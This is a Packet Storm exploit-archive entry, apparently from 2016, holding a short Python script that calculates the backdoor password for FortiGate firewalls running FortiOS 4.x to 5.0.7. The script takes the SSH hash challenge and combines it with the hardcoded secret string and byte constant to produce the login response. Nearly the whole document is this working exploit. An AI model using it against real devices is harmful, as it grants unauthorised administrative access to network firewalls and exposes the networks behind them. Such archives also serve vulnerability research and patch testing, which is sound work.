Fortigate Backdoor Password Calculator

2016-03-24T00:00:00
ID PACKETSTORM:136430
Type packetstorm
Reporter Rishabh Dangwal
Modified 2016-03-24T00:00:00

Description

                                        
                                            `# Title : Fortigate Backdoor Password calculator  
# Date : 24 March 2016  
# Author : Rishabh Dangwal, original exploit by operator8203@runbox.com.  
# Author Homepage : www.theprohack.com  
# Author Email : admin@theprohack.com  
# Vendor Homepage : www.fortinet.com  
# Version : FortiGate OS Version 4.x - 5.0.7  
import base64  
import hashlib  
print "Enter hash challenge " ; chash = raw_input()  
pwdhash = hashlib.sha1()  
pwdhash.update('\x00' * 12)  
pwdhash.update(chash + 'FGTAbc11*xy+Qqz27')  
pwdhash.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')  
fhash = 'AK1' + base64.b64encode('\x00' * 12 + pwdhash.digest())  
print "password is %s" %fhash  
`